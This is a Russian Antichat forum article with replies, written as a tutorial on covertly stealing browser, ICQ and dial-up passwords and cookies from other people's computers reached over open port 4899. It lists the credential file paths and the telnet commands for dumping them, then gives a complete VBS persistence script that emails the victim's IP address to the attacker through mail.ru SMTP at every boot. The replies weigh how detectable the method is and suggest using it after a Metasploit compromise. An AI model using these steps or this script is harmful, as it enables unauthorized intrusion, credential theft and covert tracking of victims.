Форум АНТИЧАТ - Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)

Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]

Cейчас я покажу как стырить пароли от Opera , IE , Mozilla , ICQ и пароли от инета .
Через 4899 порт . Как всегда сканим диапазон на открытый порт . Нам нужно передать файлы и воспользоватся telnet'ом .
Cookies от IE находятся в C:\Documents and Settings\[Имя_Юзера]\Cookies - копируем всё на комп . Здесь все кукисы берем те которые нам нужны .
Их много берём что то типо user@mail[1].txt здесь будут куки от mail.ru . Ну здесь куки от всех сайтов .
Пароль от Icq в C:\Documents and Settings\[Имя_Юзера]\Application Data\ICQ\[uin_юзера]\Owner.mdb .
Пароли от Opera'ы в C:\Documents and Settings\[Имя_Юзера]\Application Data\Opera\Opera\profile\wand.dat
Теперь стырим Cookies от Mozill'ы вспомошью проги Mozilla Cookies View . Кидаем прогу на диск "С". И пишем в Telnet .

Код:

cd\

mzcv.exe /stext pass_mozilla.txt - (mzcv название проги вкратце) ну и всё на диске появится pass_mozilla.txt там будут куки от Мозилы. напишем ламреру сообщение .

И пасы от инета стырим прогой Dialupass , также кидаем на диск "С" и пишем в Telnet.

Код:

cd\

x.exe /stext pass_inet.txt

Теперь надо всё расшифровать . Для этого нужны проги Unwand -(расшифровывает пароли в Oper'е) и ICQ6 hash recover -(расшифровывает пароль от icq6)
Куки могут неподойти так как они долго нежевут , а расшифровать пас от ICQ легко .
Указываем путь к Owner.mdb bи получаем md5 хеш , расшифровываем его и всё .
Теперь покажу для текех у кого ip динамический , как сделать чтобы ip приходил при включении компа . Просто помешаем mail.vbs в автозагрузку и всё .
Ну вот и всё каждый раз при включении ипы будет приходить на мыло .
Тело mail.vbs :

Код:

Set WshShell = CreateObject("WScript.Shell") 

WshShell.Run "cmd.exe /c ipconfig > C:\WINDOWS\ip.txt", 0, false 



WScript.Sleep (5000)



Set S = CreateObject("Wscript.Shell")

set FSO=createobject("scripting.filesystemobject")

Call SendPost("smtp.mail.ru","куда_придёт ипы@mail.ru","левое мыло@mail.ru","IP ЛАМЕРА","hacked by hack-win32")

Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)

Set iMsg=CreateObject("CDO.Message")

Set iConf=CreateObject("CDO.Configuration")

Set Flds=iConf.Fields

Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2

Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1

Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин левого мыла без"@mail.ru""

Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="пас левого мыла"

Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"

Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25

Flds.Update

iMsg.Configuration=iConf

iMsg.To=strTo

iMsg.From=strFrom

iMsg.Subject=strSubject

iMsg.TextBody=strBody

iMsg.AddAttachment "C:\WINDOWS\ip.txt"

iMsg.Send

End Function

Set iMsg=Nothing

Set iConf=Nothing

Set Flds=Nothing

Код:

ICQ6 hash recover

Unwand

Скачать

Видео к статье --> Скачать

(с)hack-win32 другой ник hack001

Не у всех винда ;)
Но старался, это видно

Старался-то старался...
Но вот всё палевно и неактуально.
Пригодилось бы несколько лет назад, ещё до создания пинча.

Цитата:

Сообщение от Root-access

вот чё здесь палевно ? вся работа через telnet и передачу файлов .

Цитата:

Сообщение от hack-win32

вот чё здесь палевно ? вся работа через telnet и передачу файлов .

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.

Цитата:

Сообщение от Root-access

Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Цитата:

Сообщение от X-RayBlade

Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)

Конечно, я его и не осуждаю, это хорошо, может он в итоге трой хороший напишет.

Ещё круто када 25 порт закрыт,пароли хер прийдут!

Цитата:

можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален

Цитата:

Ещё круто када 25 порт закрыт,пароли хер прийдут!

а разве порт сменить нельзя?))

Цитата:

Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)

Цитата:

Сообщение от Xcontrol212

можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален

а разве порт сменить нельзя?))

я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)

Вобщето smtp на мэйле работает по 25 порту, и по 2525 кажется.....Если они закрыты *** получится
и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?